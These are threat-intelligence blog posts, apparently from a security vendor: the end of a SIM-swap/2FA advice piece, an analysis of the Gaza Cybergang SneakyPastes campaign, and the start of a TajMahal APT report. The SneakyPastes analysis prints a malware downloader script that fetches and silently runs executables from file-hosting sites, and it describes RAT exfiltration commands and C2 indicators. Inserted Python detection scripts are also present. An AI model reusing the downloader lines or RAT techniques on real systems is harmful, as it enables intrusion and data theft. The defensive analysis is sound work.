Once the platform was implemented, the level of online banking fraud stemming from SIM swap attacks fell dramatically, with almost no cases involving banks that have implemented the anti-SIM swap platform. As a result, we saw an increase of WhatsApp hijacking in Mozambique, similar to what happened in Brazil.

Conclusion: how not to be the next victim

Voice and SMS must be avoided as authentication mechanisms

Mobile operators rely on legacy protocols for communication such as Signaling System No. 7, or SS7, which was initially developed in the 1970s. This protocol has security flaws that allow the interception of SMS messages or voice calls. By today’s standards the phone/SMS is no longer considered a secure method of authentication if you want to protect high-value information such as bank accounts. An attack on Reddit in 2018 was a wake-up call for most companies.

The National Institute of Standards and Technology (NIST) in the USA explicitly deprecated the use of SMS for 2FA in a special publication, stating:

“Verifiers SHOULD consider risk indicators such as device swap, SIM change, number porting, or other abnormal behavior before using the PSTN to deliver an out-of-band authentication secret.” (NIST 800-63B)

Some banks use software tokens that can be bound to a phone IMEI number (unique identifier); however, the difficult process of enrollment and maintaining changes, for example, when the user replaces the phone, deter many financial institutions.

When possible, we recommend users avoid two-factor authentication via SMS, opting instead for other ways, such as generating an OTP in a mobile app (like Google Authenticator) or using a physical token. Unfortunately, some online services don’t offer an alternative; in that case, the user needs to be aware of the risks.

The new era of biometrics

Some operators have implemented additional security mechanisms that require the user to authenticate through voice biometrics using a passphrase such as “my voice is my password” – the technology works reasonably well, even detecting if the voice is a recording, or if the user has flu. However, the major stumbling block that we observed is the very low enrollment base. Besides, it’s considered an expensive solution, especially for emerging markets, and requires some additional effort to integrate with backend systems.

Automated SMS: “Your number will be deactivated from this SIM card.”

When a SIM change is requested, operators can implement an automated message that’s sent to the number alerting the owner that there’s been a SIM change request and if it’s not authorized, the subscriber must contact the fraud hotline. This will not prevent the hijacking itself, it will instead alert the subscriber so that they can respond faster in the case of malicious activity. The main drawback is that the subscriber may be outside the coverage area.

Some carriers have implemented an additional layer of confirmation for any case of SIM activation, offering the option of configuring a password in their systems. This password will be required for any changes associated with your number, such as big changes in your monthly bill or even when you need a new SIM card. Talk to your carrier to check if they already offer this additional security for your number.

Process improvement

As we mentioned above, some processes contain weaknesses, especially in emerging markets. It’s important to dissect all the stages of the process and understand what the underlying weaknesses are. In the case of Mozambique, there’s a thriving black market that makes it possible to obtain fake documents. These documents can then be presented to operators as proof of identity for SIM swaps.

Activate 2FA on WhatsApp

To avoid WhatsApp hijacking, it’s of paramount importance to activate 2FA using a six-digit PIN on your device. In the event of hijacking, you’ll have another layer of security that is not so easy to bypass.

Request your number be unlisted from TrueCaller and similar apps

TrueCaller is a crowdsourced phone book. It allows people to be identified through their mobile number. However, as we mentioned before, fraudsters use this tool to find out more information about you. You can, and should, request that your number is unlisted from this global phone book.

Despite the fact that attacks on 2FA with the use of tools such as Evilginx are becoming more sophisticated, software tokens still provide a reasonable level of security by today’s standards. Whilst there is no silver bullet solution, we believe that declaring the death of SMS-based 2FA is the way to go. This is especially true when it comes to online banking, social media and email services.

10 April 2019

Gaza Cybergang Group1, operation SneakyPastes

Gaza Cybergang(s) is a politically motivated Arabic-language cyberthreat actor, actively targeting the MENA (Middle East North Africa) region, especially the Palestinian Territories.

The confusion surrounding Gaza Cybergang’s activities, separation of roles and campaigns has been prevalent in the cyber community. For a while, the gang’s activities seemed scattered, involving different tools and methods, and different malware and infection stages, although there was an alignment in its goals…

During our 2018 monitoring of this group, we were able to identify different techniques utilized by very similar attackers in the MENA region, sometimes on the same target. The findings led to us distinguishing between three attack groups operating within Gaza Cybergang:

  • Gaza Cybergang Group1 (classical low-budget group), also known as MoleRATs;
  • Gaza Cybergang Group2 (medium-level sophistication) with links to previously known Desert Falcons;
  • Gaza Cybergang Group3 (highest sophistication) whose activities previously went by the name Operation Parliament.

The groups use different styles and, in some cases, techniques, but deploy common tools and commands after initial infection. The three attack groups were identified sharing victims. For example, Group1 would deploy a script to infect a specific victim with malware belonging to Group2, or similarly between Group2 and Group3.

More information on previous Desert Falcons (Group2) and Operation Parliament (Group3) activities can be found below:

Additional findings on Gaza Cybergang Group2 and Group3 will be presented in future publications. For more information, please contact: intelreports@kaspersky.com


Gaza Cybergang Group1, described in this post, is the least sophisticated of the three attack groups and relies heavily on the use of paste sites (with the operation name SneakyPastes) in order to gradually sneak a remote access Trojan (RAT) or multiple, onto victim systems. The group has been seen employing phishing, with several chained stages to evade detection and extend command and control server lifetimes. The most popular targets of SneakyPastes are embassies, government entities, education, media outlets, journalists, activists, political parties or personnel, healthcare and banking.

In this post, we’ll take a closer look at Gaza Cybergang Group1, including:

  1. Updated 2018/2019 tactics, techniques and procedures
  2. Victimology of the group between Jan 2018 and Jan 2019
  3. Historical checkpoints and politicized graphical decoys in Appendix I
  4. Full list of indicators of compromise in Appendix II
Technical analysis

Through our continuous monitoring of threats during 2018, we observed a new wave of attacks by Gaza Cybergang Group1 targeting embassies and political personnel. Gaza Cybergang Group1 is an attack group with limited infrastructure and an open-source type of toolset, which conducts widespread attacks, but is nevertheless focused on Palestinian political problems. The attackers rely a lot on chained attack stages to evade quick detection and hide the communication infrastructure.

After an analysis of the samples, and through collaboration efforts with law enforcement agencies, we were able to uncover the full cycle of the intrusions that spread across the majority of the cyber kill chain, including but not limited to the toolset used, TTPs, infrastructure, action on objectives and the victimology. These efforts have led to the takedown of a large portion of the related infrastructure.

In this campaign, Gaza Cybergang used disposable emails and domains as the phishing platform to target the victims. Then pastebin.com, github.com, mailimg.com, upload.cat, dev-point.com and pomf.cat were used as channels for the different malware stages before achieving a full RAT implementation, which then communicates with the corresponding C2 server.

We have identified several implants that leveraged PowerShell, VBS, JS, and dotnet for resilience and persistence. The final stage, however, is a dotnet application that takes several commands such as directory listing, screenshot, compress, upload, etc. It then creates random long string folder names in temp directories to host the collected files per category before compressing, encrypting and uploading to the C2 server.


The threat actor seemed able to spread attacks widely, but only deployed additional tools and data collection functions in specific cases, as though they had a target list or a filter for targeted victims. Phishing emails with political themes were used in the majority of the observed attack emails. These were necessary to lure the intended type of victims – people involved in politics.

In order to meet the phishing emails’ infrastructure requirements, disposable domains and emails were used as the delivery medium. On occasions, the phishing emails contained links to external domains to download the first stage, and sometimes the first stage was attached to the email itself.

If the user clicks the link, they are prompted to download a RAR file containing the stage 1 malware/lure, which they then execute.

Intrusion life-cycle analysis

The diagram below displays at a high level the steps taken by typical Gaza Cybergang Group1 lure samples. While different samples may use different methods to infect (i.e. invoke PowerShell, VBS, .NET app downloader, etc.), they generally stick to the same scenario of a persistent RAT that steals data and uploads it to the C2 server despite the different hard-coded domains.

Stage 1 sample file: 3amadi_hamas.zip
MD5: e686ffa90b2bfb567547f1c0dad1ae0b
Type: Compressed container
Child file/lure name: محضر اجتماع العمادي مع هنية رئيس حماس امس الاحد .exe
Child file/lure MD5: 92dd0f16e8ae274d83ba1d0d5b2e342

This sample ZIP file, which is similar to many other stage 1 downloaders in this campaign, contains an executable that is a compiled AutoIt script and which embeds some interesting functions (listed in the table below). The executable attempts to download a couple of files from different sources and saves them in the AppData and Startup folders for persistence, then invokes the first downloaded file – Picture2.exe.

Embedded functions (with the MD5 of each downloaded file)

Sleep, 15000
UrlDownloadToFile, https://upload.cat/0037e96c45ac2098?download_token=fa26750b7e73f0081c44831d0aaf9863c75592724dbc2f781ca495f9b5fbd4ac, %AppData%\Microsoft\Windows\Picture2.exe
  MD5: 6240c31d9a82dc70a38f78d44a1ee239
sleep,4000
UrlDownloadToFile, https://upload.cat/089590f6d72aeaef?download_token=dd21809321669aa2229b20b57e2c9d34a3b507b5df7406bcac5dbb87cd169b78, %AppData%\Microsoft\Windows\Start Menu\Programs\Startup\Picture4.exe
  MD5: cab62bb5f00fe15683c6af760c8e8f7e
sleep,4000
UrlDownloadToFile, https://dev-point.co/uploads1/4ee1d5a5b0e41.jpg, %AppData%\Thr0om.jpg
  MD5: c90f9c600169cbedbeb23316ea61e214
sleep,4000
UrlDownloadToFile, https://upload.cat/ec9d388339b19e1c?download_token=131d5450c192d0591f3d06841eacc5bf5f344be9725be9456e2c222d0b4831e2, %AppData%\Microsoft\Windows\Start Menu\Programs\Startup\333Po333.exe
  MD5: 8c5f8d1ab7baa9a0764cd5650ddecd8e
sleep,5000
UrlDownloadToFile, https://upload.cat/9a08bc13e683d330?download_token=90f1ebb4e1f52835f502bea4307686afc1eb1cdee973cef1fb043febb2a92078, %AppData%\Microsoft\Windows\Start Menu\Programs\Startup\WindowsFrom444444.exe
  MD5: 2a3aa1d207030d8c7dc3cfc9c2d9f9f1
sleep,5000
UrlDownloadToFile, https://upload.cat/a1c05c819dadeefb?download_token=c6535b11a9f9bbf9e7681be8753f2058bac0df5264744be76605244e96a388f5, %AppData%\Microsoft\Windows\Start Menu\Programs\Startup\WindowsFrom355353.exe
  MD5: bd83269da75741303a19b826c5f9627d
sleep,5000
RunWait %AppData%\Microsoft\Windows\Picture2.exe ,, hide
sleep,2000

After analyzing the files downloaded from the above first stage malware, it was clear that the threat actor wanted to achieve stable persistence on the victim machine, and also used more than one technique to exfiltrate data. The analyzed samples had a lot of similarities in terms of the code used and especially in the persistence techniques.

Malware features

All the stages’ executables are created as chains to avoid detection and protect the C2 server. They consist mainly of persistence mechanisms and simple instructions despite their different forms (VBS scripts, PowerShell scripts, known software with open source code that can be backdoored, and in-house built dotnet apps). The RAT, however, had a multitude of functionalities (as listed in the table below) such as to download and execute, compress, encrypt, upload, search directories, etc. The threat actor’s main objective for using this RAT (known as Razy/NeD worm/Wonder Botnet) was obvious from the victim data that was collected – it was to search for specific file extensions such as PDF, DOC, DOCX, XLS, and XLSX, where they are compressed in RAR files per category, stored in temp directories within a folder named by victim ID (bot ID – long MD5 string), encrypted and uploaded to the C2.

Command       Brief description
KEYWORD       Downloads encrypted strings found on the /Feed server page that represent specific keywords of interest which, if found, are compressed/encrypted using WinRAR with “Keyword” appended to the file name and uploaded to the C2 using a POST command at the path “/FeedBack.php”. FeedBack.php validates the sender by User-Agent, saves the data in the “RAR” server directory and stores the metadata in the MSSQL database for later reference.
KEY           Trigger to upload all data gathered to the C2 using a POST command at the path “/log.php”. Log.php validates the sender by User-Agent, saves the data in the “UP” server directory and stores the metadata in the MSSQL database for later reference.
KEYS          Deletes the file named tempPath + “ky” so as not to upload anything.
REUPLOAD      Re-uploads recent data to the C2 server using POST at the path “/FeedBack.php”.
RESTARTME     Restarts the RAT application process.
BLOCK         Creates a file in the Temp path named “Block~” + PCID to kill the RAT.
SCREEN        Takes a PNG screenshot of the main screen, names the file with timestamps, then uploads it to the C2 server using POST at the path “/FeedBack.php”.
LAN           Creates a file in the Temp path named “LA” + PCID to possibly spread through LAN. Note: this seems to refer to an unloaded feature/module of the RAT that is not currently in use.
LANS          Deletes the file created by the LAN command to reverse the effect.
USB           Creates a file in the Temp path named “us” + PCID, then invokes another program module named Remo.test to identify removable drives.
USBS          Deletes the file created by the USB command to reverse the effect.
HD            Creates a file in the Temp path named “hd” + PCID, then invokes another program module named hd.test1 to identify logical drives.
HDS           Deletes the file created by the HD command to reverse the effect.
SHUTDOWN      Shuts down the system using cmd /s /t 0
RESTART       Reboots the system using cmd /r /t 0
PROCANDSOFT   Lists all active processes and all installed software and uploads the results to the C2 server using a POST command at “/log.php”.
DEL-TEMP      Deletes all files in the “AppData/Local/Temp” path.
RAR           Creates RAR files per logical drive containing data with timestamps for the past 7 days, then uploads the RAR to the C2 server using a POST command at the path “/FeedBack.php”.
RARM          Creates RAR files per logical drive containing data with timestamps for the past 30 days, then uploads the RAR to the C2 server using a POST command at the path “/FeedBack.php”.
RARW          Creates RAR files per logical drive containing data with timestamps for the past 7 days, then uploads the RAR to the C2 server using a POST command at the path “/FeedBack.php”.
KILL          Kills system processes.

Infrastructure
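The command table above describes several on-disk artefacts the RAT leaves in the user's Temp path: marker files named “Block~”, “LA”, “us” or “hd” followed by the PCID, the “ky” file, and staging folders named by the bot ID (a long MD5 string) that hold per-category RAR archives. As an added example, not code from the article, the following Python hunts a Temp directory for those artefacts. It assumes the PCID is the same 32-character bot ID the article mentions; the `hunt_temp_dir` and `build_sample_temp` names and the sample directory layout are constructed for the illustration.

```python
import re
import tempfile
from pathlib import Path
from typing import Dict, List

# Marker prefixes taken from the command table (BLOCK, LAN, USB, HD commands).
MARKER_PREFIXES = ("Block~", "LA", "us", "hd")
# Assumption: PCID == bot ID == a 32-character hex (MD5-like) string.
BOT_ID_RE = re.compile(r"^[0-9a-fA-F]{32}$")


def hunt_temp_dir(temp_dir: Path) -> Dict[str, List[str]]:
    """Scan one Temp directory (non-recursively) for RAT artefacts.

    Returns marker files (prefix + bot ID, or the bare 'ky' file) and staging
    folders whose name is a bot ID and which contain .rar archives."""
    findings: Dict[str, List[str]] = {"marker_files": [], "staging_dirs": []}
    for entry in temp_dir.iterdir():
        if entry.is_file():
            if entry.name == "ky":  # KEY/KEYS upload-control file
                findings["marker_files"].append(entry.name)
                continue
            for prefix in MARKER_PREFIXES:
                suffix = entry.name[len(prefix):]
                if entry.name.startswith(prefix) and BOT_ID_RE.match(suffix):
                    findings["marker_files"].append(entry.name)
                    break
        elif entry.is_dir() and BOT_ID_RE.match(entry.name):
            # Collected documents are staged per category as RAR files
            # inside a folder named by bot ID before upload.
            rars = [f.name for f in entry.iterdir() if f.suffix.lower() == ".rar"]
            if rars:
                findings["staging_dirs"].append(entry.name)
    return findings


def build_sample_temp() -> Path:
    """Constructed directory imitating the artefacts described above: a
    kill marker, a drive-enumeration marker, a bot-ID staging folder with
    per-category RAR files, and benign noise that must not be flagged."""
    root = Path(tempfile.mkdtemp(prefix="hunt_demo_"))
    bot_id = "0123456789abcdef0123456789abcdef"  # constructed, not a real bot ID
    (root / f"Block~{bot_id}").write_text("")
    (root / f"hd{bot_id}").write_text("")
    staging = root / bot_id
    staging.mkdir()
    (staging / "PDF.rar").write_bytes(b"Rar!")
    (staging / "DOCX.rar").write_bytes(b"Rar!")
    (root / "installer.log").write_text("benign")
    (root / "LAmbda_notes.txt").write_text("benign")  # prefix hit, no bot ID -> ignored
    return root


def demo() -> Dict[str, List[str]]:
    return hunt_temp_dir(build_sample_temp())


if __name__ == "__main__":
    print(demo())
```

In a real hunt the function would be pointed at each user's AppData\Local\Temp; the bot-ID regex does the real filtering, since two-letter prefixes such as “us” or “hd” would otherwise match ordinary file names.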

In 2018, the threat actor mostly relied on a single C2 server ( and rotated a multitude of domain names over a period of time. However, the attacks’ different stages were hosted on a variety of free sites such as Mailimg, Github, Pastebin, dev-point.co, a.pomf.cat, and upload.cat.

The phishing email infrastructure though relied on disposable email providers such as bit-degree.com, mail4gmail.com, careless-whisper.com and others.
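The infrastructure description gives a defender two traffic facts: stage payloads are fetched from the named paste and upload sites, and the RAT reports to its C2 with POST requests to /FeedBack.php and /log.php. As an added example, not code from the article, the Python below runs that logic over a few constructed proxy-log lines and reports clients that show a C2-style POST, noting when a paste-site fetch preceded it. The log format, client addresses and the `c2.example` host are constructed; the stage hosts and paths come from the article.

```python
import re
from collections import defaultdict
from typing import Dict, Iterator

# Channels the article names for hosting the malware stages.
STAGE_HOSTS = {
    "pastebin.com", "github.com", "gist.github.com", "mailimg.com",
    "upload.cat", "dev-point.com", "dev-point.co", "pomf.cat", "a.pomf.cat",
}
# Paths the RAT POSTs to on its C2 (compared case-insensitively).
C2_PATHS = {"/feedback.php", "/log.php"}

# Constructed log format: <ISO time> <client> <method> <host> <path> <status>
LOG_RE = re.compile(r"^(\S+) (\S+) (GET|POST) (\S+) (\S+) (\d{3})$")

# Constructed sample: one client fetching two stages then posting to a C2,
# one benign client using GitHub and a GET that merely ends in /log.php.
SAMPLE_LOG = """\
2018-09-03T09:00:01 10.0.0.5 GET upload.cat /0037e96c45ac2098 200
2018-09-03T09:00:17 10.0.0.5 GET dev-point.co /uploads1/4ee1d5a5b0e41.jpg 200
2018-09-03T09:02:40 10.0.0.5 POST c2.example /FeedBack.php 200
2018-09-03T09:03:05 10.0.0.5 POST c2.example /log.php 200
2018-09-03T09:10:00 10.0.0.9 GET github.com /python/cpython 200
2018-09-03T09:11:00 10.0.0.9 GET www.example.org /log.php 200
"""


def parse(log_text: str) -> Iterator[dict]:
    """Yield one dict per well-formed log line; malformed lines are skipped."""
    for line in log_text.splitlines():
        m = LOG_RE.match(line.strip())
        if m:
            ts, client, method, host, path, _status = m.groups()
            yield {"ts": ts, "client": client, "method": method,
                   "host": host.lower(), "path": path}


def analyze(log_text: str) -> Dict[str, dict]:
    """Per client: stage-host downloads, C2-style POSTs, and whether a
    stage download preceded the first C2 POST (the chain the article describes).
    Only clients with at least one C2-style POST are returned, because
    stage hosts alone (GitHub, Pastebin) are far too common to alert on."""
    per_client = defaultdict(lambda: {"stage_downloads": [], "c2_posts": [], "chain": False})
    for ev in parse(log_text):
        rec = per_client[ev["client"]]
        path = ev["path"].split("?", 1)[0].lower()  # drop query string
        if ev["method"] == "GET" and ev["host"] in STAGE_HOSTS:
            rec["stage_downloads"].append(ev["host"])
        elif ev["method"] == "POST" and path in C2_PATHS:
            rec["c2_posts"].append(ev["host"] + path)
            if rec["stage_downloads"]:
                rec["chain"] = True
    return {c: r for c, r in per_client.items() if r["c2_posts"]}


if __name__ == "__main__":
    for client, rec in analyze(SAMPLE_LOG).items():
        print(client, rec)
```

The method check matters: a GET whose path happens to be /log.php is ordinary web traffic, while the RAT's upload channel is specifically a POST. The two C2 paths are generic enough that this is a hunting query to be confirmed against the Appendix II hashes rather than a blocking rule.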


Based on the analyzed metrics, the victims were spread across 39 countries and reached 240+ unique victims. The Palestinian Territories host the majority of the victims, followed by Jordan, Israel, then Lebanon, as noted in the below table.

The most targeted entities are embassies, government entities, education, media outlets, journalists, activists, political parties or personnel, healthcare and banking.

Country                  Number of victims
Palestinian Territories  110
Jordan                   25
Israel                   17
Lebanon                  11
Saudi Arabia             9
Syria                    9
Egypt                    7
UAE                      6
Senegal, France, Germany, Iran, Malaysia, Belgium, Bosnia and Herzegovina, Libya, Morocco, Spain, Sri Lanka, Tunisia, Afghanistan, Armenia, Azerbaijan, Cyprus, India, Indonesia, Iraq, Ireland, Italy, Kuwait, Oman, Poland, Romania, Russia, Serbia, Slovenia, Sudan, UK, USA   < 5

Conclusions

While Gaza Cybergang Group1 described in this post looks like a low sophistication group, with limited infrastructure and attack files that can be found in the wild, they are the most relentless in their attacks, with continuous targeting and high malleability. This has allowed the group to achieve reasonable success against a relatively wide array of victims.

Gaza Cybergang is evolving and adapting to the MENA region – a complex setting with complex requirements. The attacks are now divided into three groups with different levels of sophistication and different levels of targeting. We expect the damage caused by these groups to intensify and the attacks to extend into other regions that are also linked to the complicated Palestinian situation. The attackers also seem to be within reach of more advanced tools, techniques and procedures, and we expect them to rely more on these in future attacks. More information on Desert Falcons (Group2) and Operation Parliament (Group3) will be presented in future publications.

Appendix I – Main historical checkpoints and politicized decoys, Gaza Cybergang Group1 2016-2019

MD5 hash: B3a472f81f800b32fe6595f44c9bf63b
First seen: Feb 2016
Filename/decoy: برقية وزارة الخارجية التركية لسيادتكم حول موضوع هام.exe
Translation: Letter for you from the Turkish Ministry of Foreign Affairs on Russian military operations in Syria
C2 server: en.gameoolines.com (

MD5 hash: Df3f3ad279ca98f947214ffb3c91c514, e8a29c7a6f6c0140152ca8a01e336b37
First seen: March 2016
Filename/decoy: president abu mazen meetings with khaled meshaal.lha
C2 server: dw.downloadtesting.com (

MD5 hash: f9bcc21fbb40247167c8c85ed6ef56e3
First seen: March 2016
Filename/decoy: دراسة.lha
C2 server: Dl.topgamse.com (

MD5 hash: D9dbb65a42ffe0575f0e99f7498a593e
First seen: April 2016
Filename/decoy: برقية الخارجية السعودية لسيادتكم يرجي الإطلاع – مهم.exe
Translation: Saudi Foreign Affairs telegram for you, please see – important.exe
C2 server: en.gameoolines.com (

MD5 hash: 221EEF8511169C0496BBC79F96E84A4A
First seen: April 2016
Filename/decoy: تقرير السعودية والمعلومات المتوفر – ونستكمل عند التوفر.exe
Translation: Report on Saudi available information, to be updated with new info upon availability
C2 server: dw.downloadtesting.com (

MD5 hash: 62DF4BC3738BE5AD4892200A1DC6B59A (inside: 55d33d9da371fdfe7871f2479621444a)
First seen: May 2016
Filename/decoy: معلومات عن هجوم محتمل من الحوثيين على مواقع سعودية – خاص.exe
Translation: Information on possible attack by Houthis on Saudi sites – private
C2 server: dw.downloadtesting.com (

MD5 hash: 838696872F924D28B08AAAA67388202E
First seen: May 2016
Filename/decoy: عاجل المخابرات المصرية.exe
Translation: Urgent Egyptian Intelligence
C2 server: dw.downloadtesting.com (

MD5 hash: e8be9843c372d280a506ac260567bf91
First seen: May 2016
Filename/decoy: برقية وزارة الخارجية السعودية.exe
Translation: Saudi Foreign Affairs telegram.exe
Explanation: Message on the 34th GCC for Interior Ministers.
C2 server: Wiknet.wikaba.com (, Wiknet.mooo.com

MD5 hash: 55d33d9da371fdfe7871f2479621444a
First seen: May 2016
Filename/decoy: نموذج ترشيج الدورة الخاصة .rar
Translation: Form for private training selection
Explanation: Application for a certain legal training program for judges in the UAE
C2 server: dw.downloadtesting.com (

MD5 hash: e782610bf209e81ecc42ca94b9388580
First seen: July 2016
Filename/decoy: عاجل – مؤتمر ايران.exe
Translation: Urgent – Iran conference
C2 server: dw.downloadtesting.com (

MD5 hash: 5db18ab35d29d44dda109f49d1b99f38
First seen: June 2017
Filename/decoy: פרצת פרטיות בכרום מאפשרת לאתרים להקליט אתכם ללא ידיעתכם.exe
Translation: A privacy breach in Chrome allows sites to record you without your knowledge
C2 server: Wiknet.wikaba.com (, wiknet.mooo.com

MD5 hash: Dae24e4d1dfcdd98f63f7de861d95182
First seen: June 2017
Filename/decoy: مراسلات العتيبة.. وثائق ومعلومات.exe
Translation: Al Otaiba correspondence. Documents and information
Explanation: Yousef Al Otaiba is the current United Arab Emirates ambassador to the United States and Minister of State. The decoy discusses leaks that were reported in 2017 of his emails.
C2 server: Wiknet.wikaba.com (, wiknet.mooo.com

MD5 hash: 2358dbb85a29167fa66ee6bf1a7271cd
First seen: April 2018
Filename/decoy: كتاب وزارة الخارجية الإماراتية لسيادتكم.exe
Translation: Book of the UAE MOFA for you.
Explanation: Document that looks as if it comes from the UAE MOFA discussing a political meeting between GCC countries and the EU in Belgium
C2 server: dw.downloadtesting.com (

MD5 hash: 10dfa690662b9c6db805b95500fc753d
First seen: Sept 2018
Filename/decoy: محضر اجتماع على الهاتف بين رئيس المكتب السياسي لحركة حماس اسماعيل هنية ورئيس المخابرات المصرية.exe
Translation: Minutes of a phone call between the head of the political bureau of Hamas Ismail Haniya and the head of Egyptian intelligence
C2 server: Upload.cat (download site)

MD5 hash: 6b5946e326488a8c8da3aaec2cb6e70f
First seen: Sept 2018
Explanation: Document discusses a radio talk by Khalid ‘Abd al-Majid, head of a breakaway faction of the Palestinian Popular Struggle Front, a minor left-wing group within the Palestinian Liberation Organization. He talks about an agreement between al-Nusra and ISIS militants to leave the Palestinian Yarmouk camp in Syria.
C2 server: Wiknet.wikaba.com (, Wiknet.mooo.com

MD5 hash: 342a4d93df060289b2d8362461875905
First seen: Oct 2018
Filename/decoy: تسريب من داخل القنصلية السعودية حول مقتل جمال خاشقجي.exe
Translation: Leak from the Saudi consulate on the death of Jamal Khashoggi
C2 server: Time-loss.dns05.com (

MD5 hash: c9cae9026ee2034626e4a43cfdd8b192
First seen: Jan 2019
Filename/decoy: محضر اجتماع السفير القطري العمادي مع الوفد المصري في رام الله .exe
Translation: Minutes of meeting of Qatari Ambassador Emadi with the Egyptian delegation in Ramallah
C2 server: Time-loss.dns05.com (, dji-msi.2waky.com

Appendix II – Indicators of compromise

Type     IoC                               Description
RAR md5  E686FFA90B2BFB567547F1C0DAD1AE0B  Stage 1 executable / lure
RAR md5  CE5AA4956D4D0D66BED361DDD7DB1A3B  Stage 1 executable / lure
RAR md5  4F34902C9F458008BAE26BFA5C1C00DA  Stage 1 executable / lure
RAR md5  535F8EA65969A84A68CEAF88778C6176  Stage 1 executable / lure
RAR md5  E8A29C7A6F6C0140152CA8A01E336B37  Stage 1 executable / lure
RAR md5  E782610BF209E81ECC42CA94B9388580  Stage 1 executable / lure
RAR md5  F9BCC21FBB40247167C8C85ED6EF56E3  Stage 1 executable / lure
EXE md5  33369AFD3042326E964139CABA1888D3  Stage 2 executable (19182-exe) that invokes Pastebin chain
EXE md5  2AD88AE20D8F4CB2C74CAE890FEB337A  Stage 2 executable (1918-exe) that invokes Pastebin chain
EXE md5  55929FF3E67D79F9E1E205EBD38BC494  Stage 2 executable (21918-exe) that invokes Pastebin chain
EXE md5  DA486DF0D8E03A220808C3BFA5B40D06  Stage 2 executable (Adope-exe) that invokes Pastebin chain
EXE md5  C7F98F890B21C556D16BFF55E33C33AB  Stage 2 executable (Application-exe) that invokes Pastebin chain
EXE md5  FAFCC11AF99ACF1B70997BC4BF36CFC0  Stage 2 executable (bind-exe) which is a backdoored Tile Slide Puzzle computer game that invokes Pastebin chain – code freely available
EXE md5  28CACBF64141F50426830B385AB1BE4C  Dell-cmd – Command string to delete user Temp directory
EXE md5  F30C00E87C7EE27033DC0AC421F3B4F8  Stage 2 executable (D-exe) that invokes Pastebin chain
EXE md5  51A59AEC24B5046EC4615728A5B52802  Stage 2 executable (Dv-exe) that invokes Pastebin chain
EXE md5  98BDE191AE6E2F7D8D4166C4B21A27D2  Office-vbs – github.gist lolpoke/system1
EXE md5  9E152A6ADCB57D44284AF3B6FD0C94C2  Stage 2 executable (p0w-exe) that invokes Pastebin chain
EXE md5  CAB62BB5F00FE15683C6AF760C8E8F7E  wPic4-exe – RAT executable similar to Pictures4.exe
EXE md5  192DD65864119017AA307BE3363E31BB  Powe1-exe – executable that uses scheduled tasks to execute VB scripts
EXE md5  71E462260F45C5E621A5F5C9A5724844  WinPeggy4-exe – backdoored Peggy Bees computer game –
April 10, 2019

Project TajMahal – a sophisticated new APT framework

Executive summary

‘TajMahal’ is a previously unknown and technically sophisticated APT framework discovered by Kaspersky Lab in the autumn of 2018. This full-blown spying framework consists of two packages named ‘Tokyo’ and ‘Yokohama’. It includes backdoors, loaders, orchestrators, C2 communicators, audio recorders, keyloggers, screen and webcam grabbers, documents and cryptography key stealers, and even its own file indexer for the victim’s machine. We discovered up to 80 malicious modules stored in its encrypted Virtual File System, one of the highest numbers of plugins we’ve ever seen for an APT toolset.

Just to highlight its capabilities, TajMahal is able to steal data from a CD burnt by a victim as well as from the printer queue. It can also request to steal a particular file from a previously seen USB stick; next time the USB is connected to the computer, the file will be stolen.

TajMahal has been developed and used for at least the past five years. The first known ‘legit’ sample timestamp is from August 2013, and the last one is from April 2018. The first confirmed date when TajMahal samples were seen on a victim’s machine is August 2014.

More details about TajMahal are available to customers of the Kaspersky Intelligence Reporting service (contact intelreports@kaspersky.com).

Technical details

We have discovered two different types of TajMahal packages, self-named Tokyo and Yokohama. The targeted systems found by Kaspersky Lab were infected with both packages. This suggests that Tokyo was used as the first-stage infection, deploying the fully functional Yokohama package on interesting victims, and was then left in place for backup purposes. The packages share the same code base; we identified the following interesting features:

  • Capable of stealing documents sent to the printer queue.
  • Data gathered for victim recon includes the backup list for Apple mobile devices.
  • Takes screenshots when recording VoiceIP app audio.
  • Steals written CD images.
  • Capable of stealing files previously seen on removable drives once they are available again.
  • Steals Internet Explorer, Netscape Navigator, FireFox and RealNetworks cookies.
  • If the Frontend file or related registry values are deleted, it reappears after reboot with a new name and startup type.

So far we have detected a single victim based on our telemetry – a diplomatic entity from a country in Central Asia.


The TajMahal framework is an intriguing discovery that’s of great interest, not least for its high level of technical sophistication, which is beyond any doubt. The huge number of plugins that implement a variety of features is something we have never before seen in any other APT activity. For example, it has its own indexer and emergency C2s, and it is capable of stealing specific files from external drives when they become available again.

The question is, why go to all that trouble for just one victim? A likely hypothesis is that there are other victims we haven’t found yet. This theory is reinforced by the fact that we couldn’t see how one of the files in the VFS was used by the malware, opening the door to the possibility of additional versions of the malware that have yet to be detected.

Kaspersky Lab products detect the TajMahal APT samples as HEUR:Trojan.Multi.Chaperone.gen.

Appendix I – Indicators of compromise

A full set of IOCs and Yara rules is available to customers of the Kaspersky Intelligence Reporting service – contact intelreports@kaspersky.com.

Domains and IPs

File Hashes

Appendix II – Additional technical details

The following table provides the full list of files stored in the VFS with a short description of what each plugin does:

| nn | Name | Short description |
|---|---|---|
| 00, 01 | cs64.dll, cs32.dll | C2 communication and command processing. WatchPoints document stealer. |
| 02, 03 | li64.dll, li32.dll | LocalInfo. Collects a large amount of information, titled “TAJ MAHAL”. |
| 04, 06 | ad64.dll, ad32.dll | AudioRecorder. Microphone, Voice IP applications. |
| 07, 08 | le64.dll, le32.dll | Open source-based LAME mp3 encoder (“Mar 27 2014”) used by AudioRecorder plugins (adXX.dll). |
| 09 | dd.m | MP3 file sent by AudioRecorder (adXX.dll) when the cache is cleared. |
| 10, 11 | me64.dll, me32.dll | AudioRecorder for Windows Metro applications. Injects ma32.dll into “wwahost.exe” or “audacity.exe”. |
| 12 | ma32.dll | AudioRecorder for Windows COM. Hooks IAudioClient, IAudioRenderClient, IMMDevice. |
| 13, 14 | ams_api64.dll, ams_api32.dll | Handy wrapper around the API of exXX.dll, pdXX.dll, sgXX.dll. |
| 15, 16 | ex64.dll, ex32.dll | Orchestrator. Update/install/uninstall, selects target processes and loads plugins. |
| 17, 18 | fe64.dll, fe32.dll | Template of the “Yokohama” Frontend module; used for reinstalling. |
| 19, 20 | pd64.dll, pd32.dll | Provides API to access configuration settings, working files, egress queue. |
| 21, 22 | libpng64.dll, libpng32.dll | Open source “libpng” library version 1.5.8 (February 1, 2012). Used by the Screenshoter plugin (ssXX.dll). |
| 23, 24 | rs64.dll, rs32.dll | Reinstaller/Injector. |
| 25, 26 | ix32.dll, ix64.dll | LoadLibrary call template DLL used by the Reinstaller/Injector plugin (rsXX.dll) for injecting a LoadLibrary call into running processes. |
